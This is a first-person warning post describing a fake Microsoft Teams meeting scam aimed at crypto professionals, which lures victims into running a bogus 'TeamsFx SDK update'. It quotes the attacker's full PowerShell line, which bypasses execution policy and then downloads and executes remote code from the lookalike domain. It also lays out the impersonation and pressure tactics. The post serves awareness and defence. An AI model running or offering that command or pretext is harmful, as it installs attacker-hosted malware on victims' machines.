Let me tell you how I came within steps of becoming a victim in an elaborate social engineering scheme designed to exploit something so routine and apparently harmless as a Microsoft Teams call earlier today. For most of the interaction, nothing seemed out of the ordinary. Someone who I thought was an industry contact reached out to me to set up a meeting on Microsoft Teams, and the willing collaborator in me was only to happy to jump on the call. Spoiler alert: the person on the other end was an impersonator, and they tried to get me to run malicious code on my computer. I’m recounting the entire experience here as a heads-up for friends, acquaintances and contemporaries in the crypto and Web3 community. It was almost me today; it could actually be someone else tomorrow. Step 1: The Setup — “Let’s Catch-Up Call, Old Friend” When you receive a text from the Telegram account of someone you know as a top employee of a well-known crypto PR agency, the last thing on your mind is that you’re getting sucked into a phishing setup. None of the typical red flags were immediately apparent either. This was no random DM. I wasn’t talking to an impersonator account where the “i” is subtly replaced with an “l.” I actually had a chat history with the account too, so I thought I had the real person on the other end. Nothing seemed out of place from when they started a completely friendly conversation to reconnect. Before long, a Calendly link to book a 30-minute meeting and an invitation to a Microsoft Teams call. As I said earlier, my radar never went off once throughout the interaction. I sensed the same level of professionalism and patience as one would expect from a high-ranking staff member of a top PR agency. All I knew was I had scheduled a Teams meeting from the Calendly page of an industry contact. The scammer initiates contact using a hacked account, sending a Teams meeting link. Step 2: The “Join on Desktop Only” Trap The day of the meeting came, and I clicked the Teams meeting link on my phone as I’ve done at least a thousand times in the past. However, it was not straight into the meeting as usual. Instead of being redirected into the call, a screen loaded claiming “Access to this meeting via mobile devices is not permitted due to organizer settings.” “Uh-oh! This has never happened to me before.” Well, it was no accident either. In hindsight, that was probably the first real red flag. The error screen is part of the design. The scammers need you on a desktop or laptop because their malicious payload is a command-line script that only runs on PCs. The URL in the browser “ teams.livescalls.com” is NOT the real Microsoft domain. Legit Teams meetings use teams.microsoft.com or teams.live.com. The “livescalls.com” domain looks close enough to the real thing from afar, but boy, is it far from the real thing if you look closely enough. One is the Microsoft-controlled site that claims over 320 million daily active users. The other is a completely fake site controlled by the attackers. To be fair, some organizations may use custom domains for their team meetings. However, over $1 trillion in funds lost to scammers in 2025, according to the World Economic Forum, was enough reason for me not to ignore my spidey senses. The fake “Team Access Notice” page blocks mobile access, forcing victims to use a desktop where the malicious script can run. Note the URL: teams.livescalls.com — not a Microsoft domain. The scammer pressures the victim to join on desktop after the mobile block, claiming “partners are waiting.” Step 3: The Payload — “Update Your TeamsFx SDK” Once on desktop, the fake Teams meeting displayed a professionally designed page that looks like something you would see in official Microsoft documentation. It even included real Microsoft language about TeamsFx SDK being deprecated by September 2025. The solution? Copy a code block and run it in your terminal or Command Prompt. If you took the extra step of a Google search, you’ll find that a similar SDK does exist. You just don’t need it for this teams call. The code looks harmless at first — it sets environment variables with official-sounding names like TeamsFx_API_KEY and MS_Teams_API_SECRET. But the real attack vector is sandwiched somewhere in the middle, and these attackers aren’t counting on you spotting the problem: powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent ‘teamsdk’ -UseBasicParsing).Content | iex” This single line bypasses PowerShell security policies (-ep bypass), downloads code from the attacker’s server, and executes it immediately (iex = Invoke-Expression). And just like that, whatever malware, keylogger, or remote access tool the attackers have hosted is silently installed on your device. The fake Teams meeting interface showing the malicious “TeamsFx SDK update” page being presented to participants. Note the participants in the call — AI generated videos. Step 4: The “Don’t Worry, It’s Safe” Pressure Stage When I expressed hesitation about running the script, the imposter immediately delivered a reassurance, pressure combo. The “Don’t worry, it is very simple and safe for you,” line was supposed to ease me into following the instructions in the screenshot showing me how to open Command Prompt on my PC. “Partners have already joined in Zoom,” was supposed to make me feel the pressure of not having to make everyone switch platforms because I couldn’t figure out how to run a simple Command Prompt. I wasn’t reassured. I wasn’t pressured, either. When I suggested moving the call to Google Meet, they refused. Apparently, their scam only works through their fake Teams setup. The scammer sends step-by-step instructions to run the malicious code, reassuring the victim: “Don’t worry, it is very simple and safe for you.” Step 5: Bluff Called — Blocked and Deleted I confirmed my suspicions after checking the script and the domain: I was being socially engineered and was within a few steps of becoming part of the World Economic Forum’s 2026 stats. I told the scammer directly: “I just checked and this command and the website there aren’t legit. Unfortunately I won’t be able to do it.” I offered to continue the conversation on Google Meet if they still wanted to chat. “But meeting is running now,” was the message from the other end. As expected, their response was meant to make me realize the urgency of joining the call. After all, I wouldn’t want to keep all those partners waiting for too long. Moments later, they deleted our entire correspondence and blocked me. Ah… That’s not just a red flag. Talk about shades of crimson. Business contacts don’t delete their entire conversation history and block you the moment you question a software update. After the scam is called out, the attacker insists the meeting is “running now” before deleting all messages and blocking the victim. How to Protect Yourself This type of attack is surging across the crypto, Web3, and tech industries. Scammers are compromising or impersonating real accounts belonging to PR professionals, investors, and project leads to target high-value individuals. Here’s how to stay safe: Never run commands from a meeting page. No legitimate video call platform will ever ask you to paste code into your terminal or Command Prompt. Check the URL. Real Microsoft Teams meetings live on teams.microsoft.com or teams.live.com — not “teams.livescalls.com” or any other lookalike domain. Be suspicious of “desktop only” requirements. If a meeting blocks mobile access, that’s a deliberate tactic to get you on a machine where scripts can be executed. Verify the person through a separate channel. If a known contact sends you an unusual meeting link, call them directly or message them on a different platform to confirm. Watch for “powershell -ep bypass” and “iex”. These are the two biggest red flags in any script. The first disables security, the second executes downloaded code blindly. If you already ran the script: Disconnect from the internet immediately. Run a full malware scan (Malwarebytes, Windows Defender Offline). Change all passwords from a different, clean device. Monitor crypto wallets and bank accounts for unauthorized transactions. Why This Matters for Crypto and Web3 I wouldn’t call this a typical phishing interaction, where attackers cast wide nets and see what they drag in. No, this was a targeted, multi-day social engineering operation. The attackers cosplayed as industry contemporaries for days, building rapport and setting up to casually guide you to fix a technical issue on a Teams call via a convincing fake Microsoft page. Whether they steal your credentials, drain your crypto wallet, or install persistent remote access malware, the attackers have everything to gain and nothing to lose. If you’re a founder, investor, or anyone who takes meetings in the crypto and tech space, share this article with your team. The people running these scams are getting better, and the only defense is awareness.
